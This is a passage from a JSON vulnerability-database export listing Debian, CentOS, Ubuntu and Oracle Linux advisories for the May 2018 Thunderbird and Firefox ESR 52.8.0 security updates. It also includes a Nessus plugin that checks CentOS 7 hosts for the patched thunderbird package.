asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 17, "modified": "2018-05-25T04:58:51", "published": "2018-05-25T04:58:51", "id": "DEBIAN:DSA-4209-1:C4F7E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00136.html", "title": "[SECURITY] [DSA 4209-1] thunderbird security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:04", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "Package : thunderbird\nVersion : 1:52.8.0-1~deb7u1\nCVE ID : CVE-2018-5150 CVE-2018-5154 CVE-2018-5155 CVE-2018-5159\n CVE-2018-5161 CVE-2018-5162 CVE-2018-5168 CVE-2018-5170\n CVE-2018-5178 CVE-2018-5183 CVE-2018-5184 CVE-2018-5185\n\nMultiple security issues have been found in Thunderbird, which may lead\nto the execution of arbitrary code, denial of service or attacks on\nencrypted emails.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1:52.8.0-1~deb7u1.\n\nWe recommend that you upgrade your thunderbird packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-05-25T08:38:59", "published": "2018-05-25T08:38:59", "id": "DEBIAN:DLA-1382-1:5626B", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201805/msg00013.html", "title": "[SECURITY] [DLA 1382-1] thunderbird security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:42", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "Package : firefox-esr\nVersion : 52.8.0esr-1~deb7u1\nCVE ID : CVE-2018-5150 CVE-2018-5154 CVE-2018-5155 CVE-2018-5157\n CVE-2018-5158 CVE-2018-5159 CVE-2018-5168 CVE-2018-5178\n CVE-2018-5183\n\nSeveral security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors and other implementation errors\nmay lead to the execution of arbitrary code or denial of service.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n52.8.0esr-1~deb7u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-05-11T07:42:53", "published": "2018-05-11T07:42:53", "id": "DEBIAN:DLA-1376-1:AF8F6", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201805/msg00007.html", "title": "[SECURITY] [DLA 1376-1] firefox-esr security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-11T01:24:53", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4199-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMay 10, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2018-5150 CVE-2018-5154 CVE-2018-5155 CVE-2018-5157 \n CVE-2018-5158 CVE-2018-5159 CVE-2018-5168 CVE-2018-5178 \n CVE-2018-5183\n\nSeveral security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors and other implementation errors\nmay lead to the execution of arbitrary code or denial of service.\n \nFor the oldstable distribution (jessie), these problems have been fixed\nin version 52.8.0esr-1~deb8u1.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 52.8.0esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFor the detailed security status of firefox-esr please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/firefox-esr\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 23, "modified": "2018-05-10T19:22:03", "published": "2018-05-10T19:22:03", "id": "DEBIAN:DSA-4199-1:E3C0E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00126.html", "title": "[SECURITY] [DSA 4199-1] firefox-esr security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "**CentOS Errata and Security Advisory** CESA-2018:1725\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute (CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting CVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as the original reporters.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/034886.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 5, "modified": "2018-05-29T17:26:47", "published": "2018-05-29T17:26:47", "id": "CESA-2018:1725", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/034886.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "**CentOS Errata and Security Advisory** CESA-2018:1726\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute (CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting CVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as the original reporters.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/034884.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 5, "modified": "2018-05-25T16:39:54", "published": "2018-05-25T16:39:54", "id": "CESA-2018:1726", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/034884.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:37:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "**CentOS Errata and Security Advisory** CESA-2018:1414\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 52.8.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Same-origin bypass of PDF Viewer to view protected PDF files (CVE-2018-5157)\n\n* Mozilla: Malicious PDF can inject JavaScript into PDF Viewer (CVE-2018-5158)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Wladimir Palant, Ivan Fratric, and Root Object as the original reporters.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/034870.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 5, "modified": "2018-05-17T11:21:53", "published": "2018-05-17T11:21:53", "id": "CESA-2018:1414", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/034870.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "**CentOS Errata and Security Advisory** CESA-2018:1415\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 52.8.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Same-origin bypass of PDF Viewer to view protected PDF files (CVE-2018-5157)\n\n* Mozilla: Malicious PDF can inject JavaScript into PDF Viewer (CVE-2018-5158)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Wladimir Palant, Ivan Fratric, and Root Object as the original reporters.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/034897.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 5, "modified": "2018-05-30T18:23:11", "published": "2018-05-30T18:23:11", "id": "CESA-2018:1415", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/034897.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "Multiple security issues were discovered in Thunderbird. If a user were \ntricked in to opening a specially crafted website in a browsing context, \nan attacker could potentially exploit these to cause a denial of service \nvia application crash, install lightweight themes without user \ninteraction, or execute arbitrary code. (CVE-2018-5150, CVE-2018-5154, \nCVE-2018-5155, CVE-2018-5159, CVE-2018-5168, CVE-2018-5178)\n\nAn issue was discovered when processing message headers in Thunderbird. If \na user were tricked in to opening a specially crafted message, an attacker \ncould potentially exploit this to cause a denial of service via \napplication hang. (CVE-2018-5161)\n\nIt was discovered encrypted messages could leak plaintext via the src \nattribute of remote images or links. An attacker could potentially exploit \nthis to obtain sensitive information. (CVE-2018-5162)\n\nIt was discovered that the filename of an attachment could be spoofed. An \nattacker could potentially exploit this by tricking the user in to opening \nan attachment of a different type to the one expected. (CVE-2018-5170)\n\nMultiple security issues were discovered in Skia. If a user were tricked \nin to opening a specially crafted message, an attacker could potentially \nexploit these to cause a denial of service via application crash, or \nexecute arbitrary code. (CVE-2018-5183)\n\nIt was discovered that S/MIME encrypted messages with remote content could \nleak plaintext via a chosen-ciphertext attack. An attacker could \npotentially exploit this to obtain sensitive information. (CVE-2018-5184)\n\nIt was discovered that plaintext of decrypted emails could leak by \nsubmitting an embedded form. An attacker could potentially exploit this to \nobtain sensitive information. (CVE-2018-5185)", "edition": 6, "modified": "2018-05-25T00:00:00", "published": "2018-05-25T00:00:00", "id": "USN-3660-1", "href": "https://ubuntu.com/security/notices/USN-3660-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:05:44", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "[52.8.0-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[52.8.0-1]\n- Update to 52.8.0", "edition": 6, "modified": "2018-05-24T00:00:00", "published": "2018-05-24T00:00:00", "id": "ELSA-2018-1725", "href": "http://linux.oracle.com/errata/ELSA-2018-1725.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:24", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "[52.8.0-2.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[52.8.0-2]\n- Update to 52.8.0", "edition": 5, "modified": "2018-05-24T00:00:00", "published": "2018-05-24T00:00:00", "id": "ELSA-2018-1726", "href": "http://linux.oracle.com/errata/ELSA-2018-1726.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "[52.8.0-1.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat one\n- Force requirement of newer gdk-pixbuf2 to ensure a proper update (Todd Vierling) [orabug 19847484]\n[52.8.0-1]\n- Update to 52.8.0 ESR", "edition": 5, "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "ELSA-2018-1414", "href": "http://linux.oracle.com/errata/ELSA-2018-1414.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-22T17:09:00", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "[52.8.0-1.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[52.8.0-1]\n- Update to 52.8.0 ESR", "edition": 6, "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "ELSA-2018-1415", "href": "http://linux.oracle.com/errata/ELSA-2018-1415.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-05-31T17:06:32", "description": "An update for thunderbird is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "title": "CentOS 7 : thunderbird (CESA-2018:1725)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-30T00:00:00", "cpe": ["cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:thunderbird"], "id": "CENTOS_RHSA-2018-1725.NASL", "href": "https://www.tenable.com/plugins/nessus/110205", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1725 and \n# CentOS Errata and Security Advisory 2018:1725 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110205);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"RHSA\", value:\"2018:1725\");\n\n script_name(english:\"CentOS 7 : thunderbird (CESA-2018:1725)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for thunderbird is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2018-May/022848.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd94a0b1\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-5150\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"thunderbird-52.8.0-1.el7.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:39:15", "description": "Multiple security issues have been found in Thunderbird, which may\nlead to the execution of arbitrary code, denial of service or attacks\non encrypted emails.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1:52.8.0-1~deb7u1.\n\nWe recommend that you upgrade your thunderbird packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "Debian DLA-1382-1 : thunderbird security update", "type": "nessus", 